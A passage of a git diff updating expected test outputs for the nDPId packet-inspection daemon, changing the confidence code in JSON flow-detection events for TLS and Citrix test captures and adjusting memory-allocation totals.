{"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.iit.cnr.it","ja3":"1b73862eae8f1711440a446b1ef357fd","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 
-00897{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":116,"source":"chrome.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1620902509274,"flow_last_seen":1620902509304,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1620902509304,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"146.48.58.18","src_port":64410,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.iit.cnr.it","ja3":"aa50c12a5dfa717d9d6ab34e97de79d5","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} -00897{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":117,"source":"chrome.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1620902509276,"flow_last_seen":1620902509304,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1620902509304,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"146.48.58.18","src_port":64411,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.iit.cnr.it","ja3":"aa50c12a5dfa717d9d6ab34e97de79d5","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 
-00936{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":128,"source":"chrome.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1620902509273,"flow_last_seen":1620902509333,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":635,"flow_tot_l4_payload_len":895,"flow_avg_l4_payload_len":149,"midstream":0,"thread_ts_msec":1620902509333,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"146.48.58.18","src_port":64409,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.3","client_requested_server_name":"www.iit.cnr.it","ja3":"1b73862eae8f1711440a446b1ef357fd","ja3s":"2253c82f03b621c5144709b393fde2c9","unsafe_cipher":0,"cipher":"TLS_AES_256_GCM_SHA384","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} -00936{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":132,"source":"chrome.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1620902509272,"flow_last_seen":1620902509335,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":635,"flow_tot_l4_payload_len":895,"flow_avg_l4_payload_len":149,"midstream":0,"thread_ts_msec":1620902509335,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"146.48.58.18","src_port":64408,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.3","client_requested_server_name":"www.iit.cnr.it","ja3":"1b73862eae8f1711440a446b1ef357fd","ja3s":"2253c82f03b621c5144709b393fde2c9","unsafe_cipher":0,"cipher":"TLS_AES_256_GCM_SHA384","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 
-00938{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":136,"source":"chrome.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1620902509276,"flow_last_seen":1620902509338,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":1957,"flow_avg_l4_payload_len":326,"midstream":0,"thread_ts_msec":1620902509338,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"146.48.58.18","src_port":64411,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.3","client_requested_server_name":"www.iit.cnr.it","ja3":"aa50c12a5dfa717d9d6ab34e97de79d5","ja3s":"15af977ce25de452b96affa2addb1036","unsafe_cipher":0,"cipher":"TLS_AES_256_GCM_SHA384","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} -00938{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":143,"source":"chrome.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1620902509274,"flow_last_seen":1620902509342,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":1957,"flow_avg_l4_payload_len":326,"midstream":0,"thread_ts_msec":1620902509342,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"146.48.58.18","src_port":64410,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.3","client_requested_server_name":"www.iit.cnr.it","ja3":"aa50c12a5dfa717d9d6ab34e97de79d5","ja3s":"15af977ce25de452b96affa2addb1036","unsafe_cipher":0,"cipher":"TLS_AES_256_GCM_SHA384","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 
-00675{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":5633,"source":"chrome.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":862,"flow_first_seen":1620902507870,"flow_last_seen":1620902514626,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":687973,"flow_avg_l4_payload_len":798,"midstream":0,"thread_ts_msec":1620902515049,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"146.48.58.18","src_port":64393,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"}} -00676{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":5633,"source":"chrome.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":1134,"flow_first_seen":1620902508740,"flow_last_seen":1620902515037,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":930115,"flow_avg_l4_payload_len":820,"midstream":0,"thread_ts_msec":1620902515049,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"146.48.58.18","src_port":64394,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"}} -00675{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":5633,"source":"chrome.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":376,"flow_first_seen":1620902509272,"flow_last_seen":1620902515049,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":297726,"flow_avg_l4_payload_len":791,"midstream":0,"thread_ts_msec":1620902515049,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"146.48.58.18","src_port":64408,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": 
{"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"}} -00675{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":5633,"source":"chrome.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":956,"flow_first_seen":1620902509273,"flow_last_seen":1620902515019,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":773272,"flow_avg_l4_payload_len":808,"midstream":0,"thread_ts_msec":1620902515049,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"146.48.58.18","src_port":64409,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"}} -00676{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":5633,"source":"chrome.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"finished","flow_packets_processed":1106,"flow_first_seen":1620902509274,"flow_last_seen":1620902515040,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":914291,"flow_avg_l4_payload_len":826,"midstream":0,"thread_ts_msec":1620902515049,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"146.48.58.18","src_port":64410,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"}} 
-00677{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":5633,"source":"chrome.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"finished","flow_packets_processed":1199,"flow_first_seen":1620902509276,"flow_last_seen":1620902515049,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":1009870,"flow_avg_l4_payload_len":842,"midstream":0,"thread_ts_msec":1620902515049,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"146.48.58.18","src_port":64411,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"}} +00897{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":114,"source":"chrome.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1620902509273,"flow_last_seen":1620902509303,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":635,"flow_tot_l4_payload_len":635,"flow_avg_l4_payload_len":158,"midstream":0,"thread_ts_msec":1620902509303,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"146.48.58.18","src_port":64409,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.iit.cnr.it","ja3":"1b73862eae8f1711440a446b1ef357fd","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 
+00897{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":115,"source":"chrome.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1620902509272,"flow_last_seen":1620902509303,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":635,"flow_tot_l4_payload_len":635,"flow_avg_l4_payload_len":158,"midstream":0,"thread_ts_msec":1620902509303,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"146.48.58.18","src_port":64408,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.iit.cnr.it","ja3":"1b73862eae8f1711440a446b1ef357fd","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +00897{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":116,"source":"chrome.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1620902509274,"flow_last_seen":1620902509304,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1620902509304,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"146.48.58.18","src_port":64410,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.iit.cnr.it","ja3":"aa50c12a5dfa717d9d6ab34e97de79d5","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 
+00897{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":117,"source":"chrome.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1620902509276,"flow_last_seen":1620902509304,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1620902509304,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"146.48.58.18","src_port":64411,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.iit.cnr.it","ja3":"aa50c12a5dfa717d9d6ab34e97de79d5","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +00936{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":128,"source":"chrome.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1620902509273,"flow_last_seen":1620902509333,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":635,"flow_tot_l4_payload_len":895,"flow_avg_l4_payload_len":149,"midstream":0,"thread_ts_msec":1620902509333,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"146.48.58.18","src_port":64409,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.3","client_requested_server_name":"www.iit.cnr.it","ja3":"1b73862eae8f1711440a446b1ef357fd","ja3s":"2253c82f03b621c5144709b393fde2c9","unsafe_cipher":0,"cipher":"TLS_AES_256_GCM_SHA384","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 
+00936{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":132,"source":"chrome.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1620902509272,"flow_last_seen":1620902509335,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":635,"flow_tot_l4_payload_len":895,"flow_avg_l4_payload_len":149,"midstream":0,"thread_ts_msec":1620902509335,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"146.48.58.18","src_port":64408,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.3","client_requested_server_name":"www.iit.cnr.it","ja3":"1b73862eae8f1711440a446b1ef357fd","ja3s":"2253c82f03b621c5144709b393fde2c9","unsafe_cipher":0,"cipher":"TLS_AES_256_GCM_SHA384","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +00938{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":136,"source":"chrome.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1620902509276,"flow_last_seen":1620902509338,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":1957,"flow_avg_l4_payload_len":326,"midstream":0,"thread_ts_msec":1620902509338,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"146.48.58.18","src_port":64411,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.3","client_requested_server_name":"www.iit.cnr.it","ja3":"aa50c12a5dfa717d9d6ab34e97de79d5","ja3s":"15af977ce25de452b96affa2addb1036","unsafe_cipher":0,"cipher":"TLS_AES_256_GCM_SHA384","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 
+00938{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":143,"source":"chrome.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1620902509274,"flow_last_seen":1620902509342,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":1957,"flow_avg_l4_payload_len":326,"midstream":0,"thread_ts_msec":1620902509342,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"146.48.58.18","src_port":64410,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.3","client_requested_server_name":"www.iit.cnr.it","ja3":"aa50c12a5dfa717d9d6ab34e97de79d5","ja3s":"15af977ce25de452b96affa2addb1036","unsafe_cipher":0,"cipher":"TLS_AES_256_GCM_SHA384","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +00675{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":5633,"source":"chrome.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":862,"flow_first_seen":1620902507870,"flow_last_seen":1620902514626,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":687973,"flow_avg_l4_payload_len":798,"midstream":0,"thread_ts_msec":1620902515049,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"146.48.58.18","src_port":64393,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"}} 
+00676{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":5633,"source":"chrome.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":1134,"flow_first_seen":1620902508740,"flow_last_seen":1620902515037,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":930115,"flow_avg_l4_payload_len":820,"midstream":0,"thread_ts_msec":1620902515049,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"146.48.58.18","src_port":64394,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"}} +00675{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":5633,"source":"chrome.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":376,"flow_first_seen":1620902509272,"flow_last_seen":1620902515049,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":297726,"flow_avg_l4_payload_len":791,"midstream":0,"thread_ts_msec":1620902515049,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"146.48.58.18","src_port":64408,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"}} +00675{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":5633,"source":"chrome.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":956,"flow_first_seen":1620902509273,"flow_last_seen":1620902515019,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":773272,"flow_avg_l4_payload_len":808,"midstream":0,"thread_ts_msec":1620902515049,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"146.48.58.18","src_port":64409,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": 
{"6":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"}} +00676{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":5633,"source":"chrome.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"finished","flow_packets_processed":1106,"flow_first_seen":1620902509274,"flow_last_seen":1620902515040,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":914291,"flow_avg_l4_payload_len":826,"midstream":0,"thread_ts_msec":1620902515049,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"146.48.58.18","src_port":64410,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"}} +00677{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":5633,"source":"chrome.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"finished","flow_packets_processed":1199,"flow_first_seen":1620902509276,"flow_last_seen":1620902515049,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":1009870,"flow_avg_l4_payload_len":842,"midstream":0,"thread_ts_msec":1620902515049,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"146.48.58.18","src_port":64411,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"}} 00564{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":5633,"source":"chrome.pcap","alias":"nDPId-test","packets-captured":5633,"packets-processed":5633,"total-skipped-flows":0,"total-l4-payload-len":4613247,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":6,"total-detection-updates":6,"total-updates":0,"current-active-flows":0,"total-active-flows":6,"total-idle-flows":6,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":45,"global_ts_msec":1620902515049} 
~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 5633/5633 @@ -51,9 +51,9 @@ ~~ total active/idle flows...: 6/6 ~~ total timeout flows.......: 0 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~ total memory allocated....: 6050682 bytes -~~ total memory freed........: 6050682 bytes -~~ total allocations/frees...: 123785/123785 +~~ total memory allocated....: 6184316 bytes +~~ total memory freed........: 6184316 bytes +~~ total allocations/frees...: 126547/126547 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~ json string min len.......: 462 chars ~~ json string max len.......: 943 chars diff --git a/test/results/citrix.pcap.out b/test/results/citrix.pcap.out index e19e2ade4..094fb0753 100644 --- a/test/results/citrix.pcap.out +++ b/test/results/citrix.pcap.out 
@@ -3,8 +3,8 @@ 00440{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"citrix.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":0,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":64,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":64,"pkt_l4_len":24,"thread_ts_msec":0,"pkt":"4F+5aekiABUXp3WjCABFAAAsrYMAAIAGYjoVAAAIFgAAB7CpBdYP1me4AAAAAGACgAC\/CQAAAgQFtAAA6CmQmA=="} 00439{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"citrix.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":2,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":64,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":64,"pkt_l4_len":24,"thread_ts_msec":2,"pkt":"ABUXp3Wj4F+5aekiCABFAAAsrVIAAH4GZGsWAAAHFQAACAXWsKkP1nFlD9ZnuWASgAA9vQAAAgQFtAAA3WOanQ=="} 00439{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"citrix.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":2,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":64,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":64,"pkt_l4_len":20,"thread_ts_msec":2,"pkt":"4F+5aekiABUXp3WjCABFAAAorYQAAIAGYj0VAAAIFgAAB7CpBdYP1me5D9ZxZlAQgABVegAAAAAAAAAAIuNIFQ=="} -00591{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"citrix.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":2,"flow_last_seen":8,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":6,"flow_tot_l4_payload_len":6,"flow_avg_l4_payload_len":1,"midstream":0,"thread_ts_msec":8,"l3_proto":"ip4","src_ip":"21.0.0.8","dst_ip":"22.0.0.7","src_port":45225,"dst_port":1494,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"Citrix","breed":"Acceptable","category":"Network"}} 
-00646{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":100,"source":"citrix.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":100,"flow_first_seen":2,"flow_last_seen":1605,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":855,"flow_tot_l4_payload_len":5490,"flow_avg_l4_payload_len":54,"midstream":0,"thread_ts_msec":1605,"l3_proto":"ip4","src_ip":"21.0.0.8","dst_ip":"22.0.0.7","src_port":45225,"dst_port":1494,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Citrix","breed":"Acceptable","category":"Network"}} +00591{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"citrix.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":2,"flow_last_seen":8,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":6,"flow_tot_l4_payload_len":6,"flow_avg_l4_payload_len":1,"midstream":0,"thread_ts_msec":8,"l3_proto":"ip4","src_ip":"21.0.0.8","dst_ip":"22.0.0.7","src_port":45225,"dst_port":1494,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"Citrix","breed":"Acceptable","category":"Network"}} +00646{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":100,"source":"citrix.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":100,"flow_first_seen":2,"flow_last_seen":1605,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":855,"flow_tot_l4_payload_len":5490,"flow_avg_l4_payload_len":54,"midstream":0,"thread_ts_msec":1605,"l3_proto":"ip4","src_ip":"21.0.0.8","dst_ip":"22.0.0.7","src_port":45225,"dst_port":1494,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Citrix","breed":"Acceptable","category":"Network"}} 
